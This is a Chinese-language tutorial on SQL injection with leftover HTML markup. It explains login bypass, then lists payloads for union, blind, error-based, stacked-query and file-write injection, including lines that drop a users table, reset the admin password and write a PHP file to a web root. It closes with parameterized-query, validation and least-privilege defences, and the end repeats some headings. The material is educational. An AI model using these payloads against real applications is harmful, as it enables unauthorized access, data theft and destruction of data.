SQL注入攻击与防御全面指南<\/h1>

一、SQL注入基本原理<\/h2>
SQL注入是一种通过在用户输入中插入恶意SQL代码来操纵数据库查询的攻击技术。当应用程序未对用户输入进行充分验证和过滤时，攻击者可以改变原始SQL查询的逻辑。<\/p>

典型登录场景分析<\/h3>
原始SQL查询：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username =<\/span> '输入的用户名'<\/span> AND<\/span> password =<\/span> '输入的密码'<\/span>;
<\/span><\/span><\/code><\/pre>万能密码攻击原理<\/h3>


注释密码校验条件<\/strong>：<\/p>

输入用户名：admin' -- <\/code><\/li>
输入密码：任意值(如123456)<\/li>
生成SQL：
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username =<\/span> 'admin'<\/span> -- ' AND password = '123456';
<\/span><\/span><\/span><\/code><\/pre><\/li>
--<\/code>注释掉后续条件，只验证用户名<\/li>
<\/ul>
<\/li>

利用逻辑优先级<\/strong>：<\/p>

输入用户名：AAA' OR 1=1 OR '1'='1'<\/code><\/li>
输入密码：BBB<\/li>
生成SQL：
SELECT<\/span> *<\/span> FROM<\/span> admin<\/span> WHERE<\/span> Username=<\/span>'AAA'<\/span> OR<\/span> 1<\/span>=<\/span>1<\/span> OR<\/span> '1'<\/span>=<\/span>'1'<\/span> AND<\/span> Password=<\/span>'BBB'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
逻辑运算优先级：NOT > AND > OR<\/li>
1=1恒为真，使整个条件为真<\/li>
<\/ul>
<\/li>
<\/ol>
二、SQL注入技术分类<\/h2>
1. 基础注入技术<\/h3>
' or 1=1 --
<\/span><\/span><\/span>'<\/span> or<\/span> '1'<\/span>=<\/span>'1
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> #<\/span>
<\/span><\/span>' or 1=1\/*
<\/span><\/span><\/span>'<\/span> or<\/span> ''<\/span>=<\/span>'
<\/span><\/span><\/span>'<\/span> or<\/span> 'a'<\/span>=<\/span>'a
<\/span><\/span><\/span>admin'<\/span> --
<\/span><\/span><\/span><\/span>admin<\/span>' or '<\/span>1<\/span>'='<\/span>1<\/span>' --
<\/span><\/span><\/span><\/code><\/pre>2. 联合查询注入<\/h3>
' union select null, null, null --
<\/span><\/span><\/span>'<\/span> union<\/span> select<\/span> 1<\/span>, 'admin'<\/span>, 'password'<\/span> --
<\/span><\/span><\/span><\/span>' union all select null, null, null --
<\/span><\/span><\/span>'<\/span> union<\/span> select<\/span> *<\/span> from<\/span> users --
<\/span><\/span><\/span><\/code><\/pre>应用示例<\/strong>：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username =<\/span> ''<\/span> union<\/span> select<\/span> 1<\/span>, 'admin'<\/span>, 'password'<\/span> --' AND password = '123456';
<\/span><\/span><\/span><\/code><\/pre>3. 注释符注入<\/h3>
' or 1=1 --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> #<\/span>
<\/span><\/span>' or 1=1\/*
<\/span><\/span><\/span>admin'<\/span> --
<\/span><\/span><\/span><\/span>admin<\/span>' #
<\/span><\/span><\/span><\/code><\/pre>4. 时间延迟注入<\/h3>
' or SLEEP(5) --
<\/span><\/span><\/span>'<\/span> or<\/span> BENCHMARK(1000000<\/span>,MD5('test'<\/span>)) --
<\/span><\/span><\/span><\/span>' or IF(1=1, SLEEP(5), 0) --
<\/span><\/span><\/span><\/code><\/pre>5. 错误注入<\/h3>
' or 1=CONVERT(int, (select @@version)) --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>CAST<\/span>((select<\/span> @@<\/span>version<\/span>) AS<\/span> int) --
<\/span><\/span><\/span><\/code><\/pre>6. 文件操作注入<\/h3>
' or 1=1 INTO OUTFILE '<\/span>\/<\/span>var\/<\/span>www\/<\/span>html\/<\/span>test.php' --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> INTO<\/span> DUMPFILE '\/var\/www\/html\/test.php'<\/span> --
<\/span><\/span><\/span><\/code><\/pre>7. 数据库信息泄露<\/h3>
' or 1=1 UNION SELECT null, database(), null --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> UNION<\/span> SELECT<\/span> null<\/span>, user<\/span>(), null<\/span> --
<\/span><\/span><\/span><\/span>' or 1=1 UNION SELECT null, @@version, null --
<\/span><\/span><\/span><\/code><\/pre>8. 表名和列名枚举<\/h3>
' or 1=1 UNION SELECT null, table_name, null FROM information_schema.tables --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> UNION<\/span> SELECT<\/span> null<\/span>, column_name<\/span>, null<\/span> FROM<\/span> information_schema.columns WHERE<\/span> table_name<\/span>=<\/span>'users'<\/span> --
<\/span><\/span><\/span><\/code><\/pre>9. 条件注入<\/h3>
' or IF(1=1, SLEEP(5), 0) --
<\/span><\/span><\/span>'<\/span> or<\/span> CASE<\/span> WHEN<\/span> 1<\/span>=<\/span>1<\/span> THEN<\/span> SLEEP(5<\/span>) ELSE<\/span> 0<\/span> END<\/span> --
<\/span><\/span><\/span><\/code><\/pre>10. 堆叠查询注入<\/h3>
'; DROP TABLE users; --
<\/span><\/span><\/span>'<\/span>; UPDATE<\/span> users SET<\/span> password=<\/span>'hacked'<\/span> WHERE<\/span> username=<\/span>'admin'<\/span>; --
<\/span><\/span><\/span><\/span>'; INSERT INTO users (username, password) VALUES ('<\/span>hacker', '<\/span>password'); --
<\/span><\/span><\/span><\/code><\/pre>11. 布尔盲注<\/h3>
' or 1=1 AND '<\/span>1<\/span>'='<\/span>1<\/span>
<\/span><\/span>' or 1=1 AND '<\/span>1<\/span>'='<\/span>2<\/span>
<\/span><\/span>' or (SELECT COUNT(*) FROM users) > 0 --
<\/span><\/span><\/span><\/code><\/pre>12. 报错注入<\/h3>
' or 1=CONVERT(int, (select @@version)) --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>CAST<\/span>((select<\/span> @@<\/span>version<\/span>) AS<\/span> int) --
<\/span><\/span><\/span><\/code><\/pre>13. 绕过过滤技术<\/h3>
' or 1=1 --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> #<\/span>
<\/span><\/span>' or 1=1\/*
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span>; --
<\/span><\/span><\/span><\/span>' or 1=1 UNION SELECT null, null, null --
<\/span><\/span><\/span><\/code><\/pre>14. 多语句注入<\/h3>
'; DROP TABLE users; --
<\/span><\/span><\/span>'<\/span>; UPDATE<\/span> users SET<\/span> password=<\/span>'hacked'<\/span> WHERE<\/span> username=<\/span>'admin'<\/span>; --
<\/span><\/span><\/span><\/span>'; INSERT INTO users (username, password) VALUES ('<\/span>hacker', '<\/span>password'); --
<\/span><\/span><\/span><\/code><\/pre>15. 其他变种<\/h3>
' or 1=1 LIMIT 1 --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> ORDER<\/span> BY<\/span> 1<\/span> --
<\/span><\/span><\/span><\/span>' or 1=1 GROUP BY 1 --
<\/span><\/span><\/span>'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> HAVING<\/span> 1<\/span>=<\/span>1<\/span> --
<\/span><\/span><\/span><\/code><\/pre>三、SQL注入防御措施<\/h2>
1. 参数化查询\/预编译语句<\/h3>
Python + SQLite示例<\/strong>：<\/p>
import<\/span> sqlite3
<\/span><\/span>conn =<\/span> sqlite3.<\/span>connect('example.db'<\/span>)
<\/span><\/span>cursor =<\/span> conn.<\/span>cursor()
<\/span><\/span>
<\/span><\/span>username =<\/span> input("请输入用户名: "<\/span>)
<\/span><\/span>password =<\/span> input("请输入密码: "<\/span>)
<\/span><\/span>
<\/span><\/span>query =<\/span> "SELECT * FROM users WHERE username =? AND password =?"<\/span>
<\/span><\/span>cursor.<\/span>execute(query, (username, password))
<\/span><\/span><\/code><\/pre>Java + MySQL示例<\/strong>：<\/p>
PreparedStatement preparedStatement =<\/span> connection.<\/span>prepareStatement<\/span>(<\/span>
<\/span><\/span>    "SELECT * FROM users WHERE username =? AND password =?"<\/span>);<\/span>
<\/span><\/span>preparedStatement.<\/span>setString<\/span>(<\/span>1<\/span>,<\/span> username);<\/span>
<\/span><\/span>preparedStatement.<\/span>setString<\/span>(<\/span>2<\/span>,<\/span> password);<\/span>
<\/span><\/span>ResultSet resultSet =<\/span> preparedStatement.<\/span>executeQuery<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>2. 输入验证和过滤<\/h3>
Python示例<\/strong>：<\/p>
import<\/span> re
<\/span><\/span>def<\/span> validate_input<\/span>(input_str):
<\/span><\/span>    pattern =<\/span> re.<\/span>compile(r<\/span>'^[a-zA-Z0-9_]+$'<\/span>)
<\/span><\/span>    return<\/span> bool(pattern.<\/span>match(input_str))
<\/span><\/span><\/code><\/pre>Node.js示例<\/strong>：<\/p>
const<\/span> isValidUsername<\/span> =<\/span> \/^[a-zA-Z0-9]+$\/<\/span>.test<\/span>(username<\/span>);
<\/span><\/span>const<\/span> isValidPassword<\/span> =<\/span> \/^[a-zA-Z0-9]+$\/<\/span>.test<\/span>(password<\/span>);
<\/span><\/span><\/code><\/pre>3. 最小权限原则<\/h3>
CREATE<\/span> USER<\/span> 'limited_user'<\/span>@<\/span>'localhost'<\/span> IDENTIFIED BY<\/span> 'password'<\/span>;
<\/span><\/span>GRANT<\/span> SELECT<\/span> ON<\/span> your_database.users TO<\/span> 'limited_user'<\/span>@<\/span>'localhost'<\/span>;
<\/span><\/span>FLUSH PRIVILEGES<\/span>;
<\/span><\/span><\/code><\/pre>4. 错误处理<\/h3>
Python示例<\/strong>：<\/p>
try<\/span>:
<\/span><\/span>    # 数据库操作<\/span>
<\/span><\/span>except<\/span> sqlite3.<\/span>Error as<\/span> e:
<\/span><\/span>    print("发生数据库错误，请稍后再试"<\/span>)
<\/span><\/span>finally<\/span>:
<\/span><\/span>    if<\/span> conn:
<\/span><\/span>        conn.<\/span>close()
<\/span><\/span><\/code><\/pre>5. 使用ORM框架<\/h3>
Python + SQLAlchemy示例<\/strong>：<\/p>
from<\/span> sqlalchemy import<\/span> create_engine
<\/span><\/span>from<\/span> sqlalchemy.orm import<\/span> sessionmaker
<\/span><\/span>
<\/span><\/span>engine =<\/span> create_engine('sqlite:\/\/\/example.db'<\/span>)
<\/span><\/span>Session =<\/span> sessionmaker(bind=<\/span>engine)
<\/span><\/span>session =<\/span> Session()
<\/span><\/span>
<\/span><\/span>user =<\/span> session.<\/span>query(User).<\/span>filter_by(username=<\/span>username, password=<\/span>password).<\/span>first()
<\/span><\/span><\/code><\/pre>四、注释符使用注意事项<\/h2>


GET请求中的注释问题<\/strong>：<\/p>

#<\/code>在URL中会被浏览器忽略，需使用%23<\/code><\/li>
--<\/code>需要空格，可使用--+<\/code>或--%20<\/code><\/li>
<\/ul>
<\/li>

POST请求中的注释<\/strong>：<\/p>

可直接使用#<\/code>或--<\/code>(需加空格)<\/li>
<\/ul>
<\/li>

通用规则<\/strong>：<\/p>

优先使用--<\/code>(加空格)<\/li>
MySQL中#<\/code>和--<\/code>都可用<\/li>
<\/ul>
<\/li>
<\/ol>
五、总结<\/h2>
SQL注入攻击形式多样，从简单的万能密码到复杂的堆叠查询和时间盲注。防御措施应以参数化查询为核心，辅以输入验证、最小权限和错误处理。ORM框架能有效减少手写SQL带来的风险。开发人员应充分了解各种注入技术，才能构建安全的数据库应用。<\/p>
SQL注入攻击与防御全面指南<\/h1>

一、SQL注入基本原理<\/h2> SQL注入是一种通过在用户输入中插入恶意SQL代码来操纵数据库查询的攻击技术。当应用程序未对用户输入进行充分验证和过滤时，攻击者可以改变原始SQL查询的逻辑。<\/p>

二、SQL注入技术分类<\/h2>

三、SQL注入防御措施<\/h2>

一、SQL注入基本原理<\/h2>
SQL注入是一种通过在用户输入中插入恶意SQL代码来操纵数据库查询的攻击技术。当应用程序未对用户输入进行充分验证和过滤时，攻击者可以改变原始SQL查询的逻辑。<\/p>
